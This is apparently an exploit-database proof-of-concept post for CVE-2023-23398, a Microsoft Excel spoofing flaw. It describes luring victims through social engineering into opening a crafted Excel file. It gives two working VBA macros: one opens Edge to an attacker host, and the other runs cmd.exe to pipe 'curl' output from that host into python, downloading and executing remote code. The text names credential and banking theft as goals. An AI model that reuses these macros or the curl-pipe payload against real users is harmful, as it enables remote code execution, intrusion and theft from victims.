Microsoft Excel Spoofing

`## Title: Microsoft Excel Spoofing Vulnerability  
## Author: nu11secur1ty  
## Date: 04.06.2023  
## Vendor: https://www.microsoft.com/  
## Software: https://www.microsoft.com/en-us/microsoft-365/excel  
## Reference: https://www.rapid7.com/fundamentals/spoofing-attacks/  
## CVE-2023-23398  
  
## Description:  
The attack itself is carried out locally by a user with authentication  
to the targeted system. An attacker could exploit the vulnerability by  
convincing a victim, through social engineering, to download and open  
a specially crafted file from a website which could lead to a local  
attack on the victim's computer. The attacker can trick the victim to  
open a malicious web page by using an Excel malicious file and he can  
steal credentials, bank accounts information, sniffing and tracking  
all the traffic of the victim without stopping - it depends on the  
scenario and etc.  
  
STATUS: HIGH Vulnerability  
  
[+]Exploit:  
  
```vbs  
Sub Check_your_salaries()  
CreateObject("Shell.Application").ShellExecute  
"microsoft-edge:http://192.168.100.96/"  
End Sub  
```  
[+]The victim Exploit + Curl Piping:  
  
## WARNING:  
The exploit server must be STREAMING at the moment when the victim hit  
the button of the exploit!  
  
```vbs  
Sub silno_chukane()  
Call Shell("cmd.exe /S /c" & "curl -s  
http://192.168.100.96/PoC/PoC.py | python", vbNormalFocus)  
End Sub  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23398)  
  
## Reference:  
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23398)  
  
[href](https://www.rapid7.com/fundamentals/spoofing-attacks/)  
  
## Proof and Exploit  
[href](https://streamable.com/n5qp4q)  
  
## Proof and Exploit  
[href](https://streamable.com/u2wxzz)  
  
## Time spend:  
01:37:00  
  
`